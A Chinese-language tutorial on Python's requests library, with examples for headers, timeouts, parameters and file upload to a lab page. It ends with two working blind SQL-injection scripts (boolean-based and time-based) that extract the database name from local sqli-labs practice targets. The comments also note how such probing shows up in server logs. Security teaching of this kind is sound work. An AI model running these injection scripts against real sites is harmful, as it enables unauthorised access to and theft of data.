py发送http请求

  import requests

  requests模块模块中的http方法

    r=requests.get()

    r=requests.post()

    r=requests.put()

    r=requests.delete()

    r=requests.head()

    r=requests.options()

  参数:

    GET参数      params

    HTTP头部      headers

    POST参数      data

    文件        files

    Cookies       cookies

    重定向处理     allow_redirects=False/True

    超时        timeout

    证书验证      verify=False/True   (False 会关闭 TLS 证书校验，响应可被中间人伪造)

    流式响应      stream=False/True

    事件挂钩      hooks=dict(response=)

    身份验证      auth=

    代理        proxies=

  对象方法:

    URL        .url

    text        .text

    编码        .encoding  |  .encoding=

    响应内容      .content

    Json解码器       .json()

    原始套接字响应   .raw | .raw.read()   (需要开启stream=True)

    历史响应代码    .history

    抛出异常      .raise_for_status()

    查看服务器响应头  .headers

    查看客户端请求头  .request.headers

    查看cookie     .cookies

    身份验证      .auth=

    更新        .update

    解析Link响应头    .links

 

  用python发送request请求

import requests

# Issue a plain GET against the local test page and keep the Response in r,
# then print the four fields these notes look at most often: body text,
# status code, the encoding requests chose for .text, and the response headers.
r = requests.get('http://localhost/pytest/get.php')
for field in (r.text, r.status_code, r.encoding, r.headers):
    print(field)

  定制头部

import requests

url = "http://localhost/pytest/get.php"
custom_headers = {"User-Agent": "dgut"}
# Override the User-Agent for this request. r.request.headers is the header
# set as actually sent (this override plus any defaults requests adds), which
# is the place to confirm the value reached the wire.
r = requests.get(url, headers=custom_headers)
print(r.request.headers)

  定义超时时间

import requests

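url = "http://localhost/pytest/timeout.php"

try:
    # timeout=3 bounds the connect and the wait for each chunk of the
    # response; a server that stalls longer than 3 s raises Timeout.
    r = requests.get(url=url, timeout=3)
    print(r.text)
except requests.exceptions.Timeout:
    # Only a real timeout is reported as "timeout".
    print("timeout")
except requests.exceptions.RequestException as err:
    # Other transport failures (refused connection, DNS failure) were
    # previously swallowed by a blanket `except Exception` and mislabelled
    # as "timeout"; report them as what they are.
    print(err)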

  给get方法传参

import requests

url = "http://localhost/pytest/get.php"
query = {"name": "test", "pwd": "test"}
# params= is URL-encoded into the query string, so "pwd" travels in the
# request line, where proxies and server access logs record it; a credential
# is better carried in a POST body over TLS.
r = requests.get(url, params=query)
print(r.text)

  给post方法传参

import requests

url = "http://localhost/pytest/post.php"
form_fields = {"username": "test1", "pwd": "empty"}
# data= with a dict sends a form-encoded request body; unlike params= in the
# GET example, the fields are not part of the URL.
r = requests.post(url, data=form_fields)
print(r.text)

  上传文件

import requests

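url = "http://localhost/pikachu/vul/unsafeupload/clientcheck.php"
post = {"submit": "submit"}    # matches the submit button's type and name
# Open the file in a `with` block so the handle is closed once the request
# has been sent, even if requests.post raises; the original left it open.
with open("title.png", "rb") as fh:
    upFile = {"uploadfile": fh}    # "uploadfile" is the name of the file input
    r = requests.post(url=url, files=upFile, data=post)
print(r.text)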

  通过py进行布尔盲注爆数据库名(sqli的less8)

import requests
import string

url = "http://127.0.0.1/sqli/Less-8/"

# Baseline: body length of the page for a well-formed id=1 request to the
# local lab. Every probe below is judged solely on whether its body length
# equals this number.
webLen = len(requests.get(url=url+"?id=1").text)  # length of the normal page
print("Len of html is:"+str(webLen))

# Step 1: find length(database()) with one GET per candidate value.
# On the server side this is a burst of requests to the same path whose
# query string differs only in an appended SQL fragment — the pattern an
# access-log review or WAF rule keys on; parameterised queries remove the
# condition the probe depends on.
dbNameLen = 0
while 1:
    tUrl = url+"?id=1'+and+length(database())="+str(dbNameLen)+"--+"    # probe the database-name length
    print(tUrl)

    if len(requests.get(tUrl).text) == webLen:   # length matches the normal page: treat this as the correct length
        print(dbNameLen)
        break
    if dbNameLen > 30:
        # Bail out after 30 candidates; note dbNameLen is then 31 and the
        # loop below still runs that many outer iterations.
        print("error")
        break
    dbNameLen += 1


# Step 2: one GET per (position, candidate letter); only string.ascii_letters
# are tried, and a position with no match is simply skipped.
dbName = ""
for i in range(1, dbNameLen+1):
    for a in string.ascii_letters:
        dbName_url = url + "?id=1'+and+substr(database(),"+str(i)+",1)='"+a+"'--+"      # enumerate the database name
        print(dbName_url)
        if len(requests.get(dbName_url).text) == webLen:

            dbName += a
            break

print(dbName)

  基于时间的盲注(sqli less9)

import requests
import string

url = "http://127.0.0.1/sqli/Less-9/?id=1"

# Determine the length of the database name.
# Each GET uses timeout=2, so a request whose sleep(6) branch runs surfaces
# as an exception on the client; the first exception is taken as the answer.
# The loop has no upper bound and `except Exception` treats any failure
# (including a refused connection) as that signal.
# Server side, every hit holds a DB connection in SLEEP for 6 s — the
# slow-query log and a run of ~2 s+ responses to one path are the
# detection handles.
a = 0
while 1:
    dbLenUrl = url + "' and if(length(database())=" + str(a) + ",sleep(6),sleep(0))" + "--+"
    try:
        r = requests.get(url=dbLenUrl, timeout=2)
        a += 1
    except Exception as e:
        print("len is " + str(a))
        break

# Determine the database name, one position at a time, by the same timing
# test over string.ascii_letters; a position where nothing times out is
# skipped rather than reported.
dbName = ""
for i in range(1, a + 1):
    for each in string.ascii_letters:
        # if(substr(database(),i,1)='each',sleep(6),sleep(0))
        dbNameUrl = url + "' and if(substr(database()," + str(i) + ",1)='" + each + "',sleep(6),sleep(0))" + "--+"
        try:
            res = requests.get(url=dbNameUrl, timeout=2)
            continue
        except Exception as e:
            dbName = dbName + each
            print(dbName)
            break

print("databaseName is " + dbName)